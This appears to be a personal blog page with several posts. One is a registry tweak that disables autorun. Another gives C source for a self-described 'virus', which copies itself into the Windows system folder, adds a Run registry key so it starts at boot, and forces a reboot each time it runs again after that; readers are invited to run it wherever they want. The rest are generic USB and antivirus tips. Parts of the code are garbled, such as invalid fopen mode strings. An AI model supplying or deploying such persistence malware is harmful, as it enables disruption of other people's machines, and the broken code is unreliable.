Ahsun Taquveem Chohan

How to disable autorun(.inf) to prevent autorun Trojan
To disable Autorun system wide (for all users) on all the drives:
save the following script as .reg -file and double-click it (melt it with registry)

======================================================Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]"HonorAutoRunSetting"=dword:00000001"NoDriveTypeAutoRun"=dword:000000ff

=======================================================

Read more…

Share on Facebook

Many people asked me how to create viruses etc stuff. Here is a simple virus/program which will restart your computer when opened. All you have to do is compile it and then run it where ever you want. Don’t worry if you run it accidentally on your system, I’ll also tell you how to remove this virus from your system completely.

Source Code:

#include<stdio.h>

#include<dos.h>

#include<dir.h> /If you get error, try using direct.h, if still you get error try compiling it in windows xp

int found,drive_no;char buff[128];

void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}

void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen("C:\\windows\\system\\sysres.exe","welcome back"); //to place a copy of itself in a remote place

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup

break;

case 2:

target=fopen("D:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\\system\\sysres.exe");

break;

case 3:

target=fopen("E:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\\system\\sysres.exe");

break;

case 4:

target=fopen("F:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\\system\\sysres.exe");

break;

default:

exit(0);

}

while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}

else

system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart

}

How to recover/remove the virus:

1) Open up PC in safe mode

2) C:\windows:\system … you will find it(sysres) so delete it !

3) open registry :

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

4) You will find it also delete it …

If anything else goes wrong, feel free to contact me

Share on Facebook

There are many ways to protect your computer against usb/flash viruses.

1.Don’t use usb/flash drives

If you will not use any usb/flash drive then there is no chance you will get usb/flash drive viruses.

2.Turn of auto play

You can do this by going to Run and type “gpedit.msc” (In windows vista press start menu + R to goto run), then press enter. Now goto

Computer Configuration > Administrative Templates > System

There you will see Turn off autoplay, double click on it and Enable it and select All drives

3.Always right click on usb/flash drive to open it.

Usb viruses executes when you double click on it, it run autorun.inf file hidden in usb, which executes the virus. So if you will never double click on the usb , there is no chance that you will get a virus.

4. Use script before accessing to usb/flash drive

I’ve created this script, which will delete autorun.inf file from your usb drive automatically, so if you will run this script, there is almost 95% chance that you will not get virus in your system.

Read more…

Share on Facebook

The openness of the Internet has dramatically transformed global communications, making it easy for people around the world to exchange information. But the very same openness also creates an enormous problem. Anyone can access the network, yet not everyone has good intentions.
Some engage in malicious mischief by unleashing destructive software programs, while others view hacking computer networks as sport. Then there are people with criminal goals in mind.
To avoid becoming a victim of misguided pranksters or cyber-crime, take the time to examine the security of your personal data. Here are our recommendations, along with links to more detailed information:
1. Use anti-virus software:
Viruses spread rapidly and can damage or destroy your computer. New ones appear almost daily. It’s critical that you install and update anti-virus software regularly. Use the program to scan all the files on your system once a week, deleting the infected ones. I use avg free edition, you can get it from http://free.avg.com
2. Beware of e-mail attachments:

A virus can hide in an attachment. Opening it will unleash the virus. Don’t open an attachment from anyone you don’t know. Even if you do know the sender, an infected attachment may have been surreptitiously sent from an infected machine. The safest thing to do is to scan the attachment with anti-virus software before you open it.
Read more…

Share on Facebook